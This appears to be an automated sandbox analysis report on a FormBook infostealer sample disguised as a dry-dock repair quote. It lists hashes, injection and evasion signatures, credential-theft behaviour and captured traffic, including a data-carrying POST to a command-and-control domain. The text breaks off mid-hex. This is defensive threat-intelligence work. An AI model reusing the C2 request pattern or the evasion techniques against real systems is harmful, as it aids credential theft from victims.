Edit tour

Windows Analysis Report
QUOTE OF DRY DOCK REPAIR.exe

Overview

General Information

Sample name:	QUOTE OF DRY DOCK REPAIR.exe
Analysis ID:	1617086
MD5:	33a08ac15da09b936fb3630a4842dc30
SHA1:	56d683a4cac0ac8a95a05a9de93e533051ee6cbb
SHA256:	a4f1adf9b786fe5e0f9fc1242b00214ec6532f42e75c4d828d368ac1ef7c91da
Tags:	exeuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected FormBook

.NET source code contains potential unpacker

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

QUOTE OF DRY DOCK REPAIR.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe" MD5: 33A08AC15DA09B936FB3630A4842DC30)

QUOTE OF DRY DOCK REPAIR.exe (PID: 7820 cmdline: "C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe" MD5: 33A08AC15DA09B936FB3630A4842DC30)

fVnaqDZrZDB.exe (PID: 2720 cmdline: "C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\24ZGSTgwuf.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

secinit.exe (PID: 7228 cmdline: "C:\Windows\SysWOW64\secinit.exe" MD5: 3B4B8DB765C75B8024A208AE6915223C)

fVnaqDZrZDB.exe (PID: 7140 cmdline: "C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\MT1pnL1UqxqS.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 2332 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.3899772190.0000000004B00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3897492692.0000000003430000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1840275000.0000000004A30000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3892116017.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1819930146.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3897571828.0000000003480000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3897222975.00000000035C0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1821216303.0000000002580000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.QUOTE OF DRY DOCK REPAIR.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.QUOTE OF DRY DOCK REPAIR.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

HTTP traffic detected: POST /s3u9/ HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USOrigin: http://www.bydotoparca.netCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 209Connection: closeReferer: http://www.bydotoparca.net/s3u9/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)Data Raw: 76 30 76 48 56 58 63 68 3d 5a 78 4c 69 52 69 71 6e 65 39 4a 77 4b 35 57 2b 49 4a 4d 6d 46 46 6c 79 57 6a 49 45 79 68 36 64 53 57 2b 6c 35 72 51 6f 6a 48 76 62 64 50 2f 6a 6e 2f 57 59 75 72 2b 54 68 32 38 78 53 79 2b 67 76 67 6f 53 71 61 72 68 67 49 51 6a 42 55 79 35 42 6f 66 53 6e 39 6f 73 4a 35 36 52 49 2f 4f 4a 51 51 63 58 65 56 64 43 61 41 55 49 58 49 78 50 37 31 73 55 32 6e 37 62 4b 61 70 72 32 5a 44 30 30 6a 6c 6b 49 68 59 42 56 46 75 2f 68 54 52 34 79 57 75 42 73 38 35 59 50 34 6b 7a 34 52 50 41 6d 4c 79 36 75 36 78 6f 66 58 79 4d 45 47 49 6c 52 7a 2f 4c 72 36 36 71 72 54 42 6c 4c 45 41 37 68 66 67 41 41 52 45 3d Data Ascii: v0vHVXch=ZxLiRiqne9JwK5W+IJMmFFlyWjIEyh6dSW+l5rQojHvbdP/jn/WYur+Th28xSy+gvgoSqarhgIQjBUy5BofSn9osJ56RI/OJQQcXeVdCaAUIXIxP71sU2n7bKapr2ZD00jlkIhYBVFu/hTR4yWuBs85YP4kz4RPAmLy6u6xofXyMEGIlRz/Lr66qrTBlLEA7hfgAARE=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:49:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:49:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:49:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:49:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 17 Feb 2025 12:50:09 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~\|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 17 Feb 2025 12:50:12 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~\|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 17 Feb 2025 12:50:14 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~\|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Mon, 17 Feb 2025 12:50:17 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 